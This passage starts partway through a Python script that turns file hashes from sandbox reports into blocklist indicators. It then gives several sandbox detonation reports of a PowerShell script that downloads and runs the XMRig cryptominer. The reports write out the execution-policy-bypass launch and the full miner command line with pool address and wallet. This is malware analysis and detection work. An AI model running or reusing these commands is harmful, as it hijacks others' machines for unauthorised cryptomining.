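| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
"""


def parse_files_section(text: str) -> list:
    """One {'path': ..., 'MD5': ..., 'SHA1': ..., ...} per file block that has a SHA256."""
    files, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if PATH_RE.match(line):
            current = {"path": line}
            files.append(current)
            continue
        m = HASH_ROW_RE.match(line)
        if m and current is not None:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != EXPECTED_LEN[algo]:   # catch transcription damage early
                raise ValueError(f"{algo} digest has wrong length for {current['path']}")
            current[algo] = digest
        elif line.startswith("memory/"):
            current = None                          # memory dumps carry no hashes
    return [f for f in files if "SHA256" in f]


def build_ioc_list(text: str) -> dict:
    """SHA256 -> {'paths': set, 'MD5': ..., 'SHA1': ..., 'SHA256': ..., 'SHA512': ...}."""
    iocs = {}
    for f in parse_files_section(text):
        if POLICY_PROBE_RE.search(f["path"]):
            continue                                # PowerShell's own policy probe
        entry = iocs.setdefault(
            f["SHA256"], {"paths": set(), **{k: f[k] for k in EXPECTED_LEN if k in f}})
        entry["paths"].add(f["path"])
    return iocs


def summarize(text: str) -> list:
    """Sorted (sha256, [paths]) pairs, ready for a blocklist or a hunt query."""
    return sorted((h, sorted(e["paths"])) for h, e in build_ioc_list(text).items())


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    for digest, paths in summarize(SAMPLE_REPORT):
        print(digest, paths)
    print("SHA256('1') =", sha256_hex(b"1"))
```

Dropping the probes by path pattern rather than by hash matters because their content, and therefore their hash, varies between runs (behavioral18 and behavioral20 show two different sets), so a hash-based allowlist would never be complete.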
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:24
Platform
win11-20240419-en
Max time kernel
1791s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the sandbox lists no description, indicator, process or target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3500 wrote to memory of 4052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3500 wrote to memory of 4052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3500-0-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/3500-1-0x00000277695D0000-0x00000277695F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_na2oneoe.kg5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3500-10-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-11-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-12-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-14-0x0000027769AE0000-0x0000027769AF2000-memory.dmp
memory/3500-15-0x0000027769AC0000-0x0000027769ACA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4052-46-0x000001ECE6730000-0x000001ECE6750000-memory.dmp
memory/4052-47-0x000001ECE7F30000-0x000001ECE7F50000-memory.dmp
memory/4052-48-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/3500-50-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/4052-49-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-52-0x000001ECE7F50000-0x000001ECE7F70000-memory.dmp
memory/3500-51-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4052-54-0x000001ECE7F70000-0x000001ECE7F90000-memory.dmp
memory/3500-53-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-55-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4052-56-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-57-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-58-0x000001ECE7F50000-0x000001ECE7F70000-memory.dmp
memory/4052-59-0x000001ECE7F70000-0x000001ECE7F90000-memory.dmp
memory/4052-{60..118}-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp (59 consecutive dumps, indices 60 through 118, all of the same region)
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:29
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1768s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the sandbox lists no description, indicator, process or target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4764 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4764 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4764-2-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp
memory/4764-5-0x0000013257F00000-0x0000013257F22000-memory.dmp
memory/4764-6-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/4764-10-0x0000013258030000-0x00000132580A6000-memory.dmp
memory/4764-11-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thasetx4.xvh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4764-28-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/4764-52-0x0000013257E80000-0x0000013257E92000-memory.dmp
memory/4764-65-0x0000013257E60000-0x0000013257E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:30
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1216-0-0x00007FF864F03000-0x00007FF864F05000-memory.dmp
memory/1216-1-0x00000183AF440000-0x00000183AF462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogqg1s4j.vut.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:39
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 5032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1020 wrote to memory of 5032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
memory/1020-0-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp
memory/1020-1-0x00000268BCF10000-0x00000268BCF32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fm3fc3z.j10.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240226-en
Max time kernel
1800s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 648 wrote to memory of 1988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 648 wrote to memory of 1988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3732 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| FR | 216.58.213.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
memory/648-0-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1ufh1o2.tee.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/648-10-0x000001797DDB0000-0x000001797DDD2000-memory.dmp
memory/648-11-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-12-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-13-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-15-0x000001797DDE0000-0x000001797DDF2000-memory.dmp
memory/648-16-0x000001797C560000-0x000001797C56A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1988-47-0x0000019B68D50000-0x0000019B68D70000-memory.dmp
memory/648-48-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp
